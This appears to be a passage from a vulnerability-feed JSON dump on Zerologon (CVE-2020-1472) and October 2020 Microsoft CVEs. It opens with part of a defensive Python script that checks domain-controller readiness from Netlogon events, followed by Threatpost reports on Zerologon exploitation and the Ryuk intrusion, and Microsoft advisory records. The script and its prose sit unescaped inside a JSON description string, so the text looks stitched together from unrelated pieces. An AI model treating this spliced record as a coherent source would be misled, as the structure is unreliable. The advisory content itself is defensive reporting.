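# unless 5830/5831 show they were allowed through an explicit policy exception.
ALLOWED = {5829: "allowed during deployment phase",
           5830: "machine account allowed by exception policy",
           5831: "trust account allowed by exception policy"}
EXCEPTION_IDS = {5830, 5831}


def vulnerable_clients(events):
    """Group Netlogon 5827-5831 events per account (step 2: find non-compliant devices)."""
    clients = defaultdict(lambda: {"allowed": 0, "denied": 0, "exception": False,
                                   "ips": set(), "os": None})
    for ev in events:
        eid = ev["EventID"]
        if eid not in DENIED and eid not in ALLOWED:
            continue                      # unrelated System-log event
        entry = clients[ev["Account"]]
        entry["ips"].add(ev["ClientIP"])
        entry["os"] = ev.get("OS") or entry["os"]
        if eid in DENIED:
            entry["denied"] += 1
        else:
            entry["allowed"] += 1
            if eid in EXCEPTION_IDS:
                entry["exception"] = True
    return dict(clients)


def enforcement_state(full_secure_channel_protection, update_installed=True):
    """Classify the DC from the registry value (step 4)."""
    if not update_installed:
        return "unpatched"                # no events, no enforcement: do step 1 first
    return "enforcing" if full_secure_channel_protection == 1 else "deployment"


def readiness_report(events, full_secure_channel_protection, update_installed=True):
    """Can enforcement be switched on without breaking anything (i.e. is step 3 done)?"""
    state = enforcement_state(full_secure_channel_protection, update_installed)
    clients = vulnerable_clients(events)
    # Accounts still allowed to connect vulnerably with no exception break when
    # enforcement flips on, so they are the work items for step 3.
    blockers = sorted(a for a, c in clients.items() if c["allowed"] and not c["exception"])
    excepted = sorted(a for a, c in clients.items() if c["exception"])
    already_denied = sorted(a for a, c in clients.items() if c["denied"] and not c["allowed"])
    return {"state": state, "blockers": blockers, "excepted": excepted,
            "already_denied": already_denied,
            "ready": state != "unpatched" and not blockers}


# Constructed sample events (real ones: Get-WinEvent -FilterHashtable
# @{LogName='System'; Id=5827,5828,5829,5830,5831}).
SAMPLE_EVENTS = [
    {"EventID": 5829, "Account": "NAS-01$", "OS": "non-Windows", "ClientIP": "10.0.5.20"},
    {"EventID": 5829, "Account": "NAS-01$", "OS": "non-Windows", "ClientIP": "10.0.5.20"},
    {"EventID": 5829, "Account": "NAS-01$", "OS": "non-Windows", "ClientIP": "10.0.5.21"},
    {"EventID": 5830, "Account": "PRINTSRV$", "OS": "Windows Server 2008 R2", "ClientIP": "10.0.7.14"},
    {"EventID": 5827, "Account": "OLD-XP-BOX$", "OS": "Windows XP", "ClientIP": "10.0.9.3"},
    {"EventID": 7036, "Message": "The Netlogon service entered the running state."},
]

if __name__ == "__main__":
    print(readiness_report(SAMPLE_EVENTS, full_secure_channel_protection=0))
```

A DC in the deployment phase with any account in `blockers` is not ready: fix or replace those devices (or consciously add them to the "Domain controller: Allow vulnerable Netlogon secure channel connections" policy, which turns their events into 5830/5831) before setting FullSecureChannelProtection to 1, and keep collecting from every DC, because each one logs only the connections it served.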
Interest from the feds likely has intensified since Microsoft’s [warning earlier this month](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) that an Iranian nation-state advanced persistent threat (APT) actor that Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm) is now actively exploiting Zerologon.

“CISA urges administrators to patch all domain controllers immediately—until every domain controller is updated, the entire infrastructure remains vulnerable, as threat actors can identify and exploit a vulnerable system in minutes,” according to the CISA alert.

The agency even has released a [patch validation script](<https://github.com/cisagov/cyber.dhs.gov/tree/master/assets/report/ed-20-04_script>) to detect unpatched Microsoft domain controllers to help administrators install the update. “If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed that malicious cyber actors have compromised all identity services,” the CISA warned.

Zerologon has been a consistent thorn in Microsoft’s side since its discovery, a scenario that has escalated since early September thanks largely to the publication of [four proof-of-concept exploits](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for the flaw on [GitHub](<https://github.com/dirkjanm/CVE-2020-1472>). Soon after the exploits were published, Cisco Talos researchers [warned of a spike](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) in exploitation attempts against Zerologon.

The U.S. government first stepped in to rally organizations to update after the publication of the exploits, with the DHS issuing [a rare emergency directive](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) that ordered federal agencies to patch their Windows Servers against the flaw by Sept. 
21.\n\n#### **Hackers Put Bullseye on Healthcare: ****[On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-30T11:41:36", "type": "threatpost", "title": "Microsoft Warns Threat Actors Continue to Exploit Zerologon Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-30T11:41:36", "id": "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "href": "https://threatpost.com/microsoft-warns-zerologon-bug/160769/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-19T16:58:13", "description": "The Ryuk threat actors have struck again, moving from sending a phishing email to complete encryption across the victim\u2019s network in just five hours.\n\nThat breakneck speed is partially the result of the gang using the Zerologon privilege-escalation bug (CVE-2020-1472), less than two hours after the initial phish, researchers said.\n\nThe Zerologon vulnerability allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services, according to Microsoft. 
It was patched in August, but many organizations remain vulnerable.\n\nIn this particular attack, after the attackers elevated their privileges using Zerologon, they used a variety of commodity tools like Cobalt Strike, AdFind, WMI and PowerShell to accomplish their objective, according to the analysis from researchers at the DFIR Report, [issued Sunday](<https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/>).\n\n## **The Attack Begins**\n\nThe attack started with a phishing email containing a version of the Bazar loader, researchers said. From there, the attackers performed basic mapping of the domain, using built-in Windows utilities such as Nltest. However, they needed to escalate their privileges to do any real damage, so they exploited the recently disclosed Zerologon vulnerability, researchers said.\n\nHaving gained elevated admin privileges, the cybercriminals were able to reset the machine password of the primary domain controller, according to the analysis.\n\nThen, they moved laterally to the secondary domain controller, carrying out more domain discovery via Net and the PowerShell Active Directory module.\n\n\u201cFrom there, the threat actors appeared to use the default named pipe privilege escalation module on the server,\u201d researchers said. \u201cAt this point, the threat actors used [Remote Desktop Protocol] RDP to connect from the secondary domain controller to the first domain controller, using the built-in administrator account.\u201d\n\n## **Cobalt Strike**\n\nLateral movement was initiated via Server Message Block (SMB) and Windows Management Instrumentation (WMI) executions of Cobalt Strike beacons, researchers said. SMB is a networking file-share protocol included in Windows 10 that provides the ability to read and write files to network devices. 
WMI meanwhile enables management of data and operations on Windows-based operating systems.\n\nCobalt Strike belongs to a group of dual-use tools that are typically leveraged for both exploitation and post-exploitation tasks. Other examples in circulation include PowerShell Empire, Powersploit and Metasploit, according to [recent findings](<https://threatpost.com/fileless-malware-critical-ioc-threats-2020/159422/>) from Cisco.\n\n\u201cFrom memory analysis, we were also able to conclude the actors were using a trial version of Cobalt Strike with the EICAR string present in the network configuration for the beacon. Both portable executable and DLL beacons were used,\u201d researchers added.\n\nOnce on the main domain controller, another Cobalt Strike beacon was dropped and executed.\n\nThe analysis of the attack revealed that after about four hours and 10 minutes, the Ryuk gang pivoted from the primary domain controller, using RDP to connect to backup servers.\n\n\u201cThen more domain reconnaissance was performed using AdFind. Once this completed\u2026the threat actors were ready for their final objective,\u201d according to DFIR\u2019s report.\n\n## **Five Hours Later: Ryuk**\n\nFor the final phase of the attack, the Ryuk operators first deployed their ransomware executable onto backup servers. 
After that, the malware was dropped on other servers in the environment, and then workstations.\n\nRyuk is a highly active malware, responsible for a string of recent hits, including a high-profile attack that [shut down Universal Health Services](<https://threatpost.com/universal-health-ransomware-hospitals-nationwide/159604/>) (UHS), a Fortune-500 owner of a nationwide network of hospitals.\n\n\u201cThe threat actors finished their objective by executing the ransomware on the primary domain controller, and at the five-hour mark, the attack completed,\u201d researchers said.\n\nThe use of Zerologon made the cybercriminals\u2019 efforts much easier, since the attack didn\u2019t need to be aimed at a high-privileged user who would likely have more security controls.\n\nIn fact, the toughest part of the campaign was the start of the attack \u2013 the successful installation of Bazar from the initial phishing email, which required user interaction. Researchers note that the user was a Domain User and did not have any other permissions \u2013 but that proved to be a non-issue, thanks to Zerologon.\n\nThe attack shows that organizations need to be ready to move more quickly than ever in response to any detected malicious activity.\n\n\u201cYou need to be ready to act in less than an hour, to make sure you can effectively disrupt the threat actor,\u201d according to researchers.\n\n## **Zerologon Attacks Surge**\n\nThe case study comes as exploitation attempts against Zerologon spike. Government officials [last week warned that](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>) advanced persistent threat actors (APTs) are now leveraging the bug to target elections support systems.\n\nThat came just days after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)). 
The APT is MERCURY (also known as MuddyWater, Static Kitten and Seedworm). And, [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[In September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on Github. This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n", "cvss3": {}, "published": "2020-10-19T16:36:00", "type": "threatpost", "title": "Ryuk Ransomware Gang Uses Zerologon Bug for Lightning-Fast Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-19T16:36:00", "id": "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "href": "https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory.\n\nAn attacker who successfully exploited the vulnerability would gain execution on a victim system.\n\nThe security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, 
"published": "2020-10-13T07:00:00", "type": "mscve", "title": "Base3D Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17003"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-17003", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17003", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory. 
An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage.\n\nThe security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Media Foundation Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16915"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16915", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16915", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory. 
An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of the Windows Camera Codec Pack. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) containing a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. 
Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nThe security update addresses the vulnerability by correcting how the Windows Camera Codec Pack handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Windows Camera Codec Pack Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16968"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16968", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16968", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. 
If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of the Windows Camera Codec Pack. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) containing a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nThe security update addresses the vulnerability by correcting how the Windows Camera Codec Pack handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Windows Camera Codec Pack Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16967"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16967", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16967", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system.\n\nTo exploit the vulnerability, a user would have to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Graphics Components handle objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Microsoft Graphics Components Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16923"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16923", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16923", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. To exploit the vulnerability, an attacker could run a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.\n\nAn attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system.\n\nThe security update addresses the vulnerability by correcting how Hyper-V validates guest operating system user input.\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Windows Hyper-V Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16891"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16891", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16891", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:08", "description": "An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n\nAn attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. To exploit the vulnerability, an attacker could run a specially crafted application.\n\nThe security update addresses the vulnerability by correcting the way that WER handles and executes files.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Windows Error Reporting Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16909"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16909", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16909", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:08", "description": "An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": 
"AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16938"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16938", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16938", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the targeted user. If the targeted user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Outlook software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. 
Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nNote that where severity is indicated as Critical in the Affected Products table, the Preview Pane is an attack vector.\n\nThe security update addresses the vulnerability by correcting how Outlook handles objects in memory.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Microsoft Outlook Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16947"], "modified": "2020-10-15T07:00:00", "id": "MS:CVE-2020-16947", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16947", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. 
An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.\n\nExploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nThe security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Microsoft SharePoint Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", 